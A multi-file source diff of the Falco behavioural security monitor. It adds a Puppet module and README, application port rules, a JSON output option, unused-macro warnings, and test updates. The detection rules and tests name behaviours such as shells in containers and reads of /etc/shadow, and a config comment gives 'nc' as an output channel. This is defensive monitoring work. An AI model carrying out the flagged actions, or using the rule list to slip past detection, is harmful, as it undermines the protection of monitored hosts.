args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes.default", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o", "program_output.program=jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"]
volumeMounts:
- mountPath: /host/var/run/docker.sock
name: docker-socket
readOnly: true
- mountPath: /host/dev
name: dev-fs
readOnly: true
- mountPath: /host/proc
name: proc-fs
readOnly: true

View File

@@ -1,9 +1,7 @@
# Owned by software vendor, serving install-software.sh.
express_server:
container_name: express_server
image: node:latest
working_dir: /usr/src/app
command: bash -c "npm install && node server.js"
command: bash -c "apt-get -y update && apt-get -y install runit && npm install && runsv /usr/src/app"
ports:
- "8181:8181"
volumes:

View File

@@ -0,0 +1,2 @@
#!/bin/sh
node server.js

View File

@@ -0,0 +1,3 @@
# Example Puppet Falco Module
This contains an example [Puppet](https://puppet.com/) module for Falco.

View File

@@ -0,0 +1,7 @@
source 'https://rubygems.org'
puppetversion = ENV.key?('PUPPET_VERSION') ? "= #{ENV['PUPPET_VERSION']}" : ['>= 3.3']
gem 'puppet', puppetversion
gem 'puppetlabs_spec_helper', '>= 0.1.0'
gem 'puppet-lint', '>= 0.3.2'
gem 'facter', '>= 1.7.0'

View File

@@ -0,0 +1,241 @@
# falco
#### Table of Contents
1. [Overview](#overview)
2. [Module Description - What the module does and why it is useful](#module-description)
3. [Setup - The basics of getting started with falco](#setup)
* [What falco affects](#what-falco-affects)
* [Beginning with falco](#beginning-with-falco)
4. [Usage - Configuration options and additional functionality](#usage)
5. [Reference - An under-the-hood peek at what the module is doing and how](#reference)
5. [Limitations - OS compatibility, etc.](#limitations)
6. [Development - Guide for contributing to the module](#development)
## Overview
Sysdig Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Powered by sysdigs system call capture infrastructure, falco lets you continuously monitor and detect container, application, host, and network activity... all in one place, from one source of data, with one set of rules.
#### What kind of behaviors can Falco detect?
Falco can detect and alert on any behavior that involves making Linux system calls. Thanks to Sysdig's core decoding and state tracking functionality, falco alerts can be triggered by the use of specific system calls, their arguments, and by properties of the calling process. For example, you can easily detect things like:
- A shell is run inside a container
- A container is running in privileged mode, or is mounting a sensitive path like `/proc` from the host.
- A server process spawns a child process of an unexpected type
- Unexpected read of a sensitive file (like `/etc/shadow`)
- A non-device file is written to `/dev`
- A standard system binary (like `ls`) makes an outbound network connection
## Module Description
This module configures falco as a systemd service. You configure falco
to send its notifications to one or more output channels (syslog,
files, programs).
## Setup
### What falco affects
This module affects the following:
* The main falco configuration file `/etc/falco/falco.yaml`, including
** Output format (JSON vs plain text)
** Log level
** Rule priority level to run
** Output buffering
** Output throttling
** Output channels (syslog, file, program)
### Beginning with falco
To have Puppet install falco with the default parameters, declare the falco class:
``` puppet
class { 'falco': }
```
When you declare this class with the default options, the module:
* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system.
* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled.
* Starts the falco service.
## Usage
### Enabling file output
To enable file output, set the `file_output` hash, as follows:
``` puppet
class { 'falco':
file_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'filename' => '/tmp/falco-events.txt'
},
}
```
### Enabling program output
To enable program output, set the `program_output` hash and optionally the `json_output` parameters, as follows:
``` puppet
class { 'falco':
json_output => 'true',
program_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'program' => 'curl http://some-webhook.com'
},
}
```
## Reference
* [**Public classes**](#public-classes)
* [Class: falco](#class-falco)
### Public Classes
#### Class: `falco`
Guides the basic setup and installation of falco on your system.
When this class is declared with the default options, Puppet:
* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system.
* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled.
* Starts the falco service.
You can simply declare the default `falco` class:
``` puppet
class { 'falco': }
```
###### `rules_file`
An array of files for falco to load. Order matters--the first file listed will be loaded first.
Default: `['/etc/falco/falco_rules.yaml', '/etc/falco/falco_rules.local.yaml']`
##### `json_output`
Whether to output events in json or text.
Default: `false`
##### `log_stderr`
Send falco's logs to stderr. Note: this is not notifications, this is
logs from the falco daemon itself.
Default: `false`
##### `log_syslog`
Send falco's logs to syslog. Note: this is not notifications, this is
logs from the falco daemon itself.
Default: `true`
##### `log_level`
Minimum log level to include in logs. Note: these levels are
separate from the priority field of rules. This refers only to the
log level of falco's internal logging. Can be one of "emergency",
"alert", "critical", "error", "warning", "notice", "info", "debug".
Default: `info`
##### `priority`
Minimum rule priority level to load and run. All rules having a
priority more severe than this level will be loaded/run. Can be one
of "emergency", "alert", "critical", "error", "warning", "notice",
"info", "debug".
Default: `debug`
##### `buffered_outputs`
Whether or not output to any of the output channels below is
buffered.
Default: `true`
##### `outputs_rate`/`outputs_max_burst`
A throttling mechanism implemented as a token bucket limits the
rate of falco notifications. This throttling is controlled by the following configuration
options:
* `outputs_rate`: the number of tokens (i.e. right to send a notification)
gained per second. Defaults to 1.
* `outputs_max_burst`: the maximum number of tokens outstanding. Defaults to 1000.
##### `syslog_output
Controls syslog output for notifications. Value: a hash, containing the following:
* `enabled`: `true` or `false`. Default: `true`.
Example:
``` puppet
class { 'falco':
syslog_output => {
'enabled' => 'true',
},
}
```
##### `file_output`
Controls file output for notifications. Value: a hash, containing the following:
* `enabled`: `true` or `false`. Default: `false`.
* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`.
* `filename`: Notifications will be written to this file.
Example:
``` puppet
class { 'falco':
file_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'filename' => '/tmp/falco-events.txt'
},
}
```
##### `program_output
Controls program output for notifications. Value: a hash, containing the following:
* `enabled`: `true` or `false`. Default: `false`.
* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`.
* `program`: Notifications will be written to this program.
Example:
``` puppet
class { 'falco':
program_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'program' => 'curl http://some-webhook.com'
},
}
```
## Limitations
The module works where falco works as a daemonized service (generally, Linux only).
## Development
For more information on Sysdig Falco, visit our [github](https://github.com/draios/falco) or [web site](https://sysdig.com/opensource/falco/).

View File

@@ -0,0 +1,18 @@
require 'rubygems'
require 'puppetlabs_spec_helper/rake_tasks'
require 'puppet-lint/tasks/puppet-lint'
PuppetLint.configuration.send('disable_80chars')
PuppetLint.configuration.ignore_paths = ["spec/**/*.pp", "pkg/**/*.pp"]
desc "Validate manifests, templates, and ruby files"
task :validate do
Dir['manifests/**/*.pp'].each do |manifest|
sh "puppet parser validate --noop #{manifest}"
end
Dir['spec/**/*.rb','lib/**/*.rb'].each do |ruby_file|
sh "ruby -c #{ruby_file}" unless ruby_file =~ /spec\/fixtures/
end
Dir['templates/**/*.erb'].each do |template|
sh "erb -P -x -T '-' #{template} | ruby -c"
end
end

View File

@@ -0,0 +1,13 @@
# == Class: falco::config
class falco::config inherits falco {
file { '/etc/falco/falco.yaml':
notify => Service['falco'],
ensure => file,
owner => 'root',
group => 'root',
mode => '0644',
content => template('falco/falco.yaml.erb'),
}
}

View File

@@ -0,0 +1,31 @@
class falco (
$rules_file = [
'/etc/falco/falco_rules.yaml',
'/etc/falco/falco_rules.local.yaml'
],
$json_output = 'false',
$log_stderr = 'false',
$log_syslog = 'true',
$log_level = 'info',
$priority = 'debug',
$buffered_outputs = 'true',
$outputs_rate = 1,
$outputs_max_burst = 1000,
$syslog_output = {
'enabled' => 'true'
},
$file_output = {
'enabled' => 'false',
'keep_alive' => 'false',
'filename' => '/tmp/falco_events.txt'
},
$program_output = {
'enabled' => 'false',
'keep_alive' => 'false',
'program' => 'curl http://some-webhook.com'
},
) {
include falco::install
include falco::config
include falco::service
}

View File

@@ -0,0 +1,6 @@
# == Class: falco::install
class falco::install inherits falco {
package { 'falco':
ensure => installed,
}
}

View File

@@ -0,0 +1,11 @@
# == Class: falco::service
class falco::service inherits falco {
service { 'falco':
ensure => running,
enable => true,
hasstatus => true,
hasrestart => true,
require => Package['falco'],
}
}

View File

@@ -0,0 +1,14 @@
{
"name": "sysdig-falco",
"version": "0.1.0",
"author": "sysdig",
"summary": "Sysdig Falco: Behavioral Activity Monitoring With Container Support",
"license": "GPLv2",
"source": "https://github.com/draios/falco",
"project_page": "https://github.com/draios/falco",
"issues_url": "https://github.com/draios/falco/issues",
"dependencies": [
{"name":"puppetlabs-stdlib","version_requirement":">= 1.0.0"}
]
}

View File

@@ -0,0 +1,7 @@
require 'spec_helper'
describe 'falco' do
context 'with defaults for all parameters' do
it { should contain_class('falco') }
end
end

View File

@@ -0,0 +1 @@
require 'puppetlabs_spec_helper/module_spec_helper'

View File

@@ -0,0 +1,96 @@
####
# THIS FILE MANAGED BY PUPPET. DO NOT MODIFY
####
# File(s) containing Falco rules, loaded at startup.
#
# falco_rules.yaml ships with the falco package and is overridden with
# every new software version. falco_rules.local.yaml is only created
# if it doesn't exist. If you want to customize the set of rules, add
# your customizations to falco_rules.local.yaml.
#
# The files will be read in the order presented here, so make sure if
# you have overrides they appear in later files.
rules_file:
<% Array(@rules_file).each do |file| -%>
- <%= file %>
<% end -%>
# Whether to output events in json or text
json_output: <%= @json_output %>
# Send information logs to stderr and/or syslog Note these are *not* security
# notification logs! These are just Falco lifecycle (and possibly error) logs.
log_stderr: <%= @log_stderr %>
log_syslog: <%= @log_syslog %>
# Minimum log level to include in logs. Note: these levels are
# separate from the priority field of rules. This refers only to the
# log level of falco's internal logging. Can be one of "emergency",
# "alert", "critical", "error", "warning", "notice", "info", "debug".
log_level: <%= @log_level %>
# Minimum rule priority level to load and run. All rules having a
# priority more severe than this level will be loaded/run. Can be one
# of "emergency", "alert", "critical", "error", "warning", "notice",
# "info", "debug".
priority: <%= @priority %>
# Whether or not output to any of the output channels below is
# buffered. Defaults to true
buffered_outputs: <%= @buffered_outputs %>
# A throttling mechanism implemented as a token bucket limits the
# rate of falco notifications. This throttling is controlled by the following configuration
# options:
# - rate: the number of tokens (i.e. right to send a notification)
# gained per second. Defaults to 1.
# - max_burst: the maximum number of tokens outstanding. Defaults to 1000.
#
# With these defaults, falco could send up to 1000 notifications after
# an initial quiet period, and then up to 1 notification per second
# afterward. It would gain the full burst back after 1000 seconds of
# no activity.
outputs:
rate: <%= @outputs_rate %>
max_burst: <%= @outputs_max_burst %>
# Where security notifications should go.
# Multiple outputs can be enabled.
<% unless @syslog_output.nil? -%>
syslog_output:
enabled: <%= @syslog_output['enabled'] %>
<% end -%>
# If keep_alive is set to true, the file will be opened once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the file will be re-opened
# for each output message.
<% unless @file_output.nil? -%>
file_output:
enabled: <%= @file_output['enabled'] %>
keep_alive: <%= @file_output['keep_alive'] %>
filename: <%= @file_output['filename'] %>
<% end -%>
# Possible additional things you might want to do with program output:
# - send to a slack webhook:
# program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
# - logging (alternate method than syslog):
# program: logger -t falco-test
# - send over a network connection:
# program: nc host.example.com 80
# If keep_alive is set to true, the program will be started once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the program will be re-spawned
# for each output message.
<% unless @program_output.nil? -%>
program_output:
enabled: <%= @program_output['enabled'] %>
keep_alive: <%= @program_output['keep_alive'] %>
program: <%= @program_output['program'] %>
<% end -%>

View File

@@ -0,0 +1,12 @@
# The baseline for module testing used by Puppet Labs is that each manifest
# should have a corresponding test manifest that declares that class or defined
# type.
#
# Tests are then run by using puppet apply --noop (to check for compilation
# errors and view a log of events) or by fully applying the test in a virtual
# environment (to compare the resulting system state to the desired state).
#
# Learn more about module testing here:
# http://docs.puppetlabs.com/guides/tests_smoke.html
#
include falco

View File

@@ -14,6 +14,11 @@ rules_file:
# Whether to output events in json or text
json_output: false
# When using json output, whether or not to include the "output" property
# itself (e.g. "File below a known binary directory opened for writing
# (user=root ....") in the json output.
json_include_output_property: true
# Send information logs to stderr and/or syslog Note these are *not* security
# notification logs! These are just Falco lifecycle (and possibly error) logs.
log_stderr: true

View File

@@ -5,6 +5,7 @@ endif()
if(NOT DEFINED FALCO_RULES_DEST_FILENAME)
set(FALCO_RULES_DEST_FILENAME "falco_rules.yaml")
set(FALCO_LOCAL_RULES_DEST_FILENAME "falco_rules.local.yaml")
set(FALCO_APP_RULES_DEST_FILENAME "application_rules.yaml")
endif()
if(DEFINED FALCO_COMPONENT)
@@ -17,6 +18,9 @@ install(FILES falco_rules.local.yaml
COMPONENT "${FALCO_COMPONENT}"
DESTINATION "${FALCO_ETC_DIR}"
RENAME "${FALCO_LOCAL_RULES_DEST_FILENAME}")
# Intentionally *not* installing application_rules.yaml. Not needed
# when falco is embedded in other projects.
else()
install(FILES falco_rules.yaml
DESTINATION "${FALCO_ETC_DIR}"
@@ -25,5 +29,9 @@ install(FILES falco_rules.yaml
install(FILES falco_rules.local.yaml
DESTINATION "${FALCO_ETC_DIR}"
RENAME "${FALCO_LOCAL_RULES_DEST_FILENAME}")
install(FILES application_rules.yaml
DESTINATION "${FALCO_ETC_DIR}"
RENAME "${FALCO_APP_RULES_DEST_FILENAME}")
endif()

View File

@@ -0,0 +1,169 @@
################################################################
# By default all application-related rules are disabled for
# performance reasons. Depending on the application(s) you use,
# uncomment the corresponding rule definitions for
# application-specific activity monitoring.
################################################################
# Elasticsearch ports
- macro: elasticsearch_cluster_port
condition: fd.sport=9300
- macro: elasticsearch_api_port
condition: fd.sport=9200
- macro: elasticsearch_port
condition: elasticsearch_cluster_port or elasticsearch_api_port
# - rule: Elasticsearch unexpected network inbound traffic
# desc: inbound network traffic to elasticsearch on a port other than the standard ports
# condition: user.name = elasticsearch and inbound and not elasticsearch_port
# output: "Inbound network traffic to Elasticsearch on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Elasticsearch unexpected network outbound traffic
# desc: outbound network traffic from elasticsearch on a port other than the standard ports
# condition: user.name = elasticsearch and outbound and not elasticsearch_cluster_port
# output: "Outbound network traffic from Elasticsearch on unexpected port (connection=%fd.name)"
# priority: WARNING
# ActiveMQ ports
- macro: activemq_cluster_port
condition: fd.sport=61616
- macro: activemq_web_port
condition: fd.sport=8161
- macro: activemq_port
condition: activemq_web_port or activemq_cluster_port
# - rule: Activemq unexpected network inbound traffic
# desc: inbound network traffic to activemq on a port other than the standard ports
# condition: user.name = activemq and inbound and not activemq_port
# output: "Inbound network traffic to ActiveMQ on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Activemq unexpected network outbound traffic
# desc: outbound network traffic from activemq on a port other than the standard ports
# condition: user.name = activemq and outbound and not activemq_cluster_port
# output: "Outbound network traffic from ActiveMQ on unexpected port (connection=%fd.name)"
# priority: WARNING
# Cassandra ports
# https://docs.datastax.com/en/cassandra/2.0/cassandra/security/secureFireWall_r.html
- macro: cassandra_thrift_client_port
condition: fd.sport=9160
- macro: cassandra_cql_port
condition: fd.sport=9042
- macro: cassandra_cluster_port
condition: fd.sport=7000
- macro: cassandra_ssl_cluster_port
condition: fd.sport=7001
- macro: cassandra_jmx_port
condition: fd.sport=7199
- macro: cassandra_port
condition: >
cassandra_thrift_client_port or
cassandra_cql_port or cassandra_cluster_port or
cassandra_ssl_cluster_port or cassandra_jmx_port
# - rule: Cassandra unexpected network inbound traffic
# desc: inbound network traffic to cassandra on a port other than the standard ports
# condition: user.name = cassandra and inbound and not cassandra_port
# output: "Inbound network traffic to Cassandra on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Cassandra unexpected network outbound traffic
# desc: outbound network traffic from cassandra on a port other than the standard ports
# condition: user.name = cassandra and outbound and not (cassandra_ssl_cluster_port or cassandra_cluster_port)
# output: "Outbound network traffic from Cassandra on unexpected port (connection=%fd.name)"
# priority: WARNING
# Couchdb ports
# https://github.com/davisp/couchdb/blob/master/etc/couchdb/local.ini
- macro: couchdb_httpd_port
condition: fd.sport=5984
- macro: couchdb_httpd_ssl_port
condition: fd.sport=6984
# xxx can't tell what clustering ports are used. not writing rules for this
# yet.
# Fluentd ports
- macro: fluentd_http_port
condition: fd.sport=9880
- macro: fluentd_forward_port
condition: fd.sport=24224
# - rule: Fluentd unexpected network inbound traffic
# desc: inbound network traffic to fluentd on a port other than the standard ports
# condition: user.name = td-agent and inbound and not (fluentd_forward_port or fluentd_http_port)
# output: "Inbound network traffic to Fluentd on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Tdagent unexpected network outbound traffic
# desc: outbound network traffic from fluentd on a port other than the standard ports
# condition: user.name = td-agent and outbound and not fluentd_forward_port
# output: "Outbound network traffic from Fluentd on unexpected port (connection=%fd.name)"
# priority: WARNING
# Gearman ports
# http://gearman.org/protocol/
# - rule: Gearman unexpected network outbound traffic
# desc: outbound network traffic from gearman on a port other than the standard ports
# condition: user.name = gearman and outbound and outbound and not fd.sport = 4730
# output: "Outbound network traffic from Gearman on unexpected port (connection=%fd.name)"
# priority: WARNING
# Zookeeper
- macro: zookeeper_port
condition: fd.sport = 2181
# Kafka ports
# - rule: Kafka unexpected network inbound traffic
# desc: inbound network traffic to kafka on a port other than the standard ports
# condition: user.name = kafka and inbound and fd.sport != 9092
# output: "Inbound network traffic to Kafka on unexpected port (connection=%fd.name)"
# priority: WARNING
# Memcached ports
# - rule: Memcached unexpected network inbound traffic
# desc: inbound network traffic to memcached on a port other than the standard ports
# condition: user.name = memcached and inbound and fd.sport != 11211
# output: "Inbound network traffic to Memcached on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: Memcached unexpected network outbound traffic
# desc: any outbound network traffic from memcached. memcached never initiates outbound connections.
# condition: user.name = memcached and outbound
# output: "Unexpected Memcached outbound connection (connection=%fd.name)"
# priority: WARNING
# MongoDB ports
- macro: mongodb_server_port
condition: fd.sport = 27017
- macro: mongodb_shardserver_port
condition: fd.sport = 27018
- macro: mongodb_configserver_port
condition: fd.sport = 27019
- macro: mongodb_webserver_port
condition: fd.sport = 28017
# - rule: Mongodb unexpected network inbound traffic
# desc: inbound network traffic to mongodb on a port other than the standard ports
# condition: >
# user.name = mongodb and inbound and not (mongodb_server_port or
# mongodb_shardserver_port or mongodb_configserver_port or mongodb_webserver_port)
# output: "Inbound network traffic to MongoDB on unexpected port (connection=%fd.name)"
# priority: WARNING
# MySQL ports
# - rule: Mysql unexpected network inbound traffic
# desc: inbound network traffic to mysql on a port other than the standard ports
# condition: user.name = mysql and inbound and fd.sport != 3306
# output: "Inbound network traffic to MySQL on unexpected port (connection=%fd.name)"
# priority: WARNING
# - rule: HTTP server unexpected network inbound traffic
# desc: inbound network traffic to a http server program on a port other than the standard ports
# condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
# output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
# priority: WARNING

File diff suppressed because it is too large Load Diff

View File

@@ -30,6 +30,7 @@ class FalcoTest(Test):
self.trace_file = os.path.join(self.basedir, self.trace_file)
self.json_output = self.params.get('json_output', '*', default=False)
self.json_include_output_property = self.params.get('json_include_output_property', '*', default=True)
self.priority = self.params.get('priority', '*', default='debug')
self.rules_file = self.params.get('rules_file', '*', default=os.path.join(self.basedir, '../rules/falco_rules.yaml'))
@@ -249,7 +250,11 @@ class FalcoTest(Test):
for line in res.stdout.splitlines():
if line.startswith('{'):
obj = json.loads(line)
for attr in ['time', 'rule', 'priority', 'output']:
if self.json_include_output_property:
attrs = ['time', 'rule', 'priority', 'output']
else:
attrs = ['time', 'rule', 'priority']
for attr in attrs:
if not attr in obj:
self.fail("Falco JSON object {} does not contain property \"{}\"".format(line, attr))
@@ -348,8 +353,8 @@ class FalcoTest(Test):
trace_arg = "-e {}".format(self.trace_file)
# Run falco
cmd = '{} {} {} -c {} {} -o json_output={} -o priority={} -v'.format(
self.falco_binary_path, self.rules_args, self.disabled_args, self.conf_file, trace_arg, self.json_output, self.priority)
cmd = '{} {} {} -c {} {} -o json_output={} -o json_include_output_property={} -o priority={} -v'.format(
self.falco_binary_path, self.rules_args, self.disabled_args, self.conf_file, trace_arg, self.json_output, self.json_include_output_property, self.priority)
for tag in self.disable_tags:
cmd += ' -T {}'.format(tag)

View File

@@ -319,7 +319,7 @@ trace_files: !mux
detect_counts:
- "Write below binary dir": 1
- "Read sensitive file untrusted": 3
- "Run shell in container": 1
- "Run shell untrusted": 1
- "Write below rpm database": 1
- "Write below etc": 1
- "System procs network activity": 1
@@ -655,3 +655,19 @@ trace_files: !mux
- rules/rule_append_false.yaml
trace_file: trace_files/cat_write.scap
json_output_no_output_property:
json_output: True
json_include_output_property: False
detect: True
detect_level: WARNING
rules_file:
- rules/rule_append.yaml
trace_file: trace_files/cat_write.scap
stdout_contains: "^(?!.*Warning An open of /dev/null was seen.*)"
in_operator_netmasks:
detect: True
detect_level: INFO
rules_file:
- rules/detect_connect_using_in.yaml
trace_file: trace_files/connect_localhost.scap

View File

@@ -43,11 +43,11 @@ traces: !mux
falco-event-generator:
trace_file: traces-positive/falco-event-generator.scap
detect: True
detect_level: [ERROR, WARNING, INFO, NOTICE]
detect_level: [ERROR, WARNING, INFO, NOTICE, DEBUG]
detect_counts:
- "Write below binary dir": 1
- "Read sensitive file untrusted": 3
- "Run shell in container": 1
- "Run shell untrusted": 1
- "Write below rpm database": 1
- "Write below etc": 1
- "System procs network activity": 1
@@ -59,44 +59,6 @@ traces: !mux
- "Modify binary dirs": 2
- "Change thread namespace": 2
installer-fbash-manages-service:
trace_file: traces-info/installer-fbash-manages-service.scap
detect: True
detect_level: INFO
detect_counts:
- "Installer bash manages service": 4
installer-bash-non-https-connection:
trace_file: traces-positive/installer-bash-non-https-connection.scap
detect: True
detect_level: NOTICE
detect_counts:
- "Installer bash non https connection": 1
installer-fbash-runs-pkgmgmt:
trace_file: traces-info/installer-fbash-runs-pkgmgmt.scap
detect: True
detect_level: [NOTICE, INFO]
detect_counts:
- "Installer bash runs pkgmgmt program": 4
- "Installer bash non https connection": 4
installer-bash-starts-network-server:
trace_file: traces-positive/installer-bash-starts-network-server.scap
detect: True
detect_level: NOTICE
detect_counts:
- "Installer bash starts network server": 2
- "Installer bash non https connection": 3
installer-bash-starts-session:
trace_file: traces-positive/installer-bash-starts-session.scap
detect: True
detect_level: NOTICE
detect_counts:
- "Installer bash starts session": 1
- "Installer bash non https connection": 3
mkdir-binary-dirs:
trace_file: traces-positive/mkdir-binary-dirs.scap
detect: True
@@ -111,13 +73,6 @@ traces: !mux
detect_counts:
- "Modify binary dirs": 1
modify-package-repo-list-installer:
trace_file: traces-info/modify-package-repo-list-installer.scap
detect: True
detect_level: INFO
detect_counts:
- "Write below etc in installer": 1
non-sudo-setuid:
trace_file: traces-positive/non-sudo-setuid.scap
detect: True
@@ -131,6 +86,7 @@ traces: !mux
detect_level: WARNING
detect_counts:
- "Read sensitive file untrusted": 1
- "Read sensitive file trusted after startup": 1
read-sensitive-file-untrusted:
trace_file: traces-positive/read-sensitive-file-untrusted.scap
@@ -146,13 +102,6 @@ traces: !mux
detect_counts:
- "Run shell untrusted": 1
shell-in-container:
trace_file: traces-positive/shell-in-container.scap
detect: True
detect_level: DEBUG
detect_counts:
- "Run shell in container": 1
system-binaries-network-activity:
trace_file: traces-positive/system-binaries-network-activity.scap
detect: True
@@ -188,13 +137,6 @@ traces: !mux
detect_counts:
- "Write below etc": 1
write-etc-installer:
trace_file: traces-info/write-etc-installer.scap
detect: True
detect_level: INFO
detect_counts:
- "Write below etc in installer": 1
write-rpm-database:
trace_file: traces-positive/write-rpm-database.scap
detect: True

View File

@@ -0,0 +1,6 @@
- rule: Localhost connect
desc: Detect any connect to the localhost network, using fd.net and the in operator
condition: evt.type=connect and fd.net in ("127.0.0.1/24")
output: Program connected to localhost network
(user=%user.name command=%proc.cmdline connection=%fd.name)
priority: INFO

Binary file not shown.

View File

@@ -88,7 +88,8 @@ void falco_engine::load_rules(const string &rules_content, bool verbose, bool al
// formats.formatter is used, so we can unconditionally set
// json_output to false.
bool json_output = false;
falco_formats::init(m_inspector, m_ls, json_output);
bool json_include_output_property = false;
falco_formats::init(m_inspector, m_ls, json_output, json_include_output_property);
m_rules->load_rules(rules_content, verbose, all_events, m_extra, m_replace_container_info, m_min_priority);
}

View File

@@ -25,6 +25,7 @@ along with falco. If not, see <http://www.gnu.org/licenses/>.
sinsp* falco_formats::s_inspector = NULL;
bool falco_formats::s_json_output = false;
bool falco_formats::s_json_include_output_property = true;
sinsp_evt_formatter_cache *falco_formats::s_formatters = NULL;
const static struct luaL_reg ll_falco [] =
@@ -36,10 +37,11 @@ const static struct luaL_reg ll_falco [] =
{NULL,NULL}
};
void falco_formats::init(sinsp* inspector, lua_State *ls, bool json_output)
void falco_formats::init(sinsp* inspector, lua_State *ls, bool json_output, bool json_include_output_property)
{
s_inspector = inspector;
s_json_output = json_output;
s_json_include_output_property = json_include_output_property;
if(!s_formatters)
{
s_formatters = new sinsp_evt_formatter_cache(s_inspector);
@@ -155,8 +157,12 @@ int falco_formats::format_event (lua_State *ls)
event["time"] = iso8601evttime;
event["rule"] = rule;
event["priority"] = level;
// This is the filled-in output line.
event["output"] = line;
if(s_json_include_output_property)
{
// This is the filled-in output line.
event["output"] = line;
}
full_line = writer.write(event);

View File

@@ -31,7 +31,7 @@ class sinsp_evt_formatter;
class falco_formats
{
public:
static void init(sinsp* inspector, lua_State *ls, bool json_output);
static void init(sinsp* inspector, lua_State *ls, bool json_output, bool json_include_output_property);
// formatter = falco.formatter(format_string)
static int formatter(lua_State *ls);
@@ -48,4 +48,5 @@ class falco_formats
static sinsp* s_inspector;
static sinsp_evt_formatter_cache *s_formatters;
static bool s_json_output;
static bool s_json_include_output_property;
};

View File

@@ -76,7 +76,8 @@ function expand_macros(ast, defs, changed)
if (defs[ast.value.value] == nil) then
error("Undefined macro '".. ast.value.value .. "' used in filter.")
end
ast.value = copy_ast_obj(defs[ast.value.value])
defs[ast.value.value].used = true
ast.value = copy_ast_obj(defs[ast.value.value].ast)
changed = true
return changed
end
@@ -88,7 +89,8 @@ function expand_macros(ast, defs, changed)
if (defs[ast.left.value] == nil) then
error("Undefined macro '".. ast.left.value .. "' used in filter.")
end
ast.left = copy_ast_obj(defs[ast.left.value])
defs[ast.left.value].used = true
ast.left = copy_ast_obj(defs[ast.left.value].ast)
changed = true
end
@@ -96,7 +98,8 @@ function expand_macros(ast, defs, changed)
if (defs[ast.right.value] == nil) then
error("Undefined macro ".. ast.right.value .. " used in filter.")
end
ast.right = copy_ast_obj(defs[ast.right.value])
defs[ast.right.value].used = true
ast.right = copy_ast_obj(defs[ast.right.value].ast)
changed = true
end
@@ -109,7 +112,8 @@ function expand_macros(ast, defs, changed)
if (defs[ast.argument.value] == nil) then
error("Undefined macro ".. ast.argument.value .. " used in filter.")
end
ast.argument = copy_ast_obj(defs[ast.argument.value])
defs[ast.argument.value].used = true
ast.argument = copy_ast_obj(defs[ast.argument.value].ast)
changed = true
end
return expand_macros(ast.argument, defs, changed)
@@ -283,11 +287,28 @@ function get_evttypes(name, ast, source)
return evttypes
end
function compiler.expand_lists_in(source, list_defs)
for name, def in pairs(list_defs) do
local begin_name_pat = "^("..name..")([%s(),=])"
local mid_name_pat = "([%s(),=])("..name..")([%s(),=])"
local end_name_pat = "([%s(),=])("..name..")$"
source, subcount1 = string.gsub(source, begin_name_pat, table.concat(def.items, ", ").."%2")
source, subcount2 = string.gsub(source, mid_name_pat, "%1"..table.concat(def.items, ", ").."%3")
source, subcount3 = string.gsub(source, end_name_pat, "%1"..table.concat(def.items, ", "))
if (subcount1 + subcount2 + subcount3) > 0 then
def.used = true
end
end
return source
end
function compiler.compile_macro(line, macro_defs, list_defs)
for name, items in pairs(list_defs) do
line = string.gsub(line, name, table.concat(items, ", "))
end
line = compiler.expand_lists_in(line, list_defs)
local ast, error_msg = parser.parse_filter(line)
@@ -325,14 +346,7 @@ end
--]]
function compiler.compile_filter(name, source, macro_defs, list_defs)
for name, items in pairs(list_defs) do
local begin_name_pat = "^("..name..")([%s(),=])"
local mid_name_pat = "([%s(),=])("..name..")([%s(),=])"
local end_name_pat = "([%s(),=])("..name..")$"
source = string.gsub(source, begin_name_pat, table.concat(items, ", ").."%2")
source = string.gsub(source, mid_name_pat, "%1"..table.concat(items, ", ").."%3")
source = string.gsub(source, end_name_pat, "%1"..table.concat(items, ", "))
end
source = compiler.expand_lists_in(source, list_defs)
local ast, error_msg = parser.parse_filter(source)

View File

@@ -347,13 +347,13 @@ function load_rules(rules_content, rules_mgr, verbose, all_events, extra, replac
if (state.lists[item] == nil) then
items[#items+1] = item
else
for i, exp_item in ipairs(state.lists[item]) do
for i, exp_item in ipairs(state.lists[item].items) do
items[#items+1] = exp_item
end
end
end
state.lists[v['list']] = items
state.lists[v['list']] = {["items"] = items, ["used"] = false}
end
for i, name in ipairs(state.ordered_macro_names) do
@@ -361,7 +361,7 @@ function load_rules(rules_content, rules_mgr, verbose, all_events, extra, replac
local v = state.macros_by_name[name]
local ast = compiler.compile_macro(v['condition'], state.macros, state.lists)
state.macros[v['macro']] = ast.filter.value
state.macros[v['macro']] = {["ast"] = ast.filter.value, ["used"] = false}
end
for i, name in ipairs(state.ordered_rule_names) do
@@ -443,6 +443,21 @@ function load_rules(rules_content, rules_mgr, verbose, all_events, extra, replac
end
end
if verbose then
-- Print info on any dangling lists or macros that were not used anywhere
for name, macro in pairs(state.macros) do
if macro.used == false then
print("Warning: macro "..name.." not refered to by any rule/macro")
end
end
for name, list in pairs(state.lists) do
if list.used == false then
print("Warning: list "..name.." not refered to by any rule/macro/list")
end
end
end
io.flush()
